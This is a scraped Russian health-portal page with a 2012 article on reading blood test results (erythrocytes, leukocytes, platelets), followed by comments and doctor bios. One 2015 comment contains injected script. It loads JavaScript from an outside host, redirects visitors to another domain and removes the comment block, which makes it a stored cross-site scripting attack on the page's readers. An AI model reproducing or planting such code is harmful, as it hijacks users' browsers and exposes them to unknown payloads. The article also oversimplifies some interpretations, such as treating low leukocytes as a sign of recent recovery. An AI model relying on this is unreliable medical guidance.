Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что говорят анализы крови  >>  Что говорят анализы крови
 
Обратная связь
 

Что говорят анализы крови

Размер шрифта
14 марта 2012 10:00
  • google_analytics: false
  • Нравится

Что можно узнать о человеке из анализа его крови? Как легко и правильно читать результаты этого самого распространенного медицинского исследования?

1 

Эритроциты

Норма у мужчин – 4,5-5,5 млн клеток в 1 мм³ крови, у женщин – 3,7-4,7 клеток в 1 мм³.

Зачем нужны эритроциты и почему мы должны заботиться об их нормальном количестве в нашем организме?

Эритроциты – это специальные красные клетки крови, которые переносят кислород во все ткани и органы. Этих маленьких клеток крови у человека больше всего, потому что задача эритроцитов – обеспечивать кислородом весь организм человека. В легких эритроциты оставляют углекислый газ и там же насыщаются кислородом, который потом они доставляют ко всем тканям организма. Если функция транспортировки кислорода прекращается, человек умирает от кислородного голодания.

Когда уровень эритроцитов в крови снижен, у человека развивается анемия: кожа бледнеет, человек ощущает слабость и недомогание. Прежде всего, страдает мозг, т.к. этот орган не переносит даже самой незначительной нехватки кислорода.

Лейкоциты

Норма у мужчин и женщин – 4-9 тысяч клеток в 1 мм³ крови.

Лейкоциты – крупные белые клетки крови, отвечающие за множество функций. Среди основных – защита от бактериальной и вирусной инфекций и регуляция постоянства внутренней среды организма, т.е. лейкоциты являются главными клетками иммунитета. Они способны определять чужеродные клетки и уничтожать их. Такой отбор лейкоциты проводят каждую секунду.

1
На фото: лейкоцит поглотил диплококк (болезнетворный микроб, который может быть возбудителем гонореи или пневмонии)

Поэтому от количества лейкоцитов зависит состояние здоровья человека.

Повышение лейкоцитов свидетельствует о том, что инфекция в самом разгаре. Именно во время болезни количество лейкоцитов в крови резко повышается.

Снижение лейкоцитов, зафиксированное в анализах, говорит, что эти клетки крови недавно очень активно использовались в предотвращении инфекции, то есть человек недавно выздоровел. В любом случае снижение лейкоцитов – показатель того, что организм устал, и ему нужно восстановиться.

Тромбоциты

Норма у мужчин и женщин – 180-320 тысяч клеток в 1 мм³ крови.

Тромбоциты отвечают за свертываемость крови и участвуют в восстановлении поврежденной ткани, другими словами они заживляют раны.

Тромбоциты формируют сгусток крови, тот самый барьер, который не допускает проникновения инфекции через повреждения кожи. Тромбоциты при помощи сгустка крови фактически заклеивают рану.

1

Этот механизм довольно простой: когда кожа повреждается, туда устремляются тромбоциты. Происходит образование тромба (сгустка), и его гелеобразная структура позволяет склеивать рану и останавливать кровь. После этого рана начинает заживать.

Снижение уровня тромбоцитов в анализах может быть свидетельством перенесенного недавно заболевания либо заболеваний крови.

Чем опасно повышение тромбоцитов? Гиперкоагуляцией. Она сопровождается замедленным током крови, что выражается в опасности образования тромбов в сосудах и нарушения кровообращения, а в результате, возникновением инфарктов и инсультов.

Норма обычно пишется в бланке для результатов анализа. Нужно только знать, что означает отступление от нормы и чем это может грозить.

 


Сюжеты по теме:
Что говорят анализы крови
 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.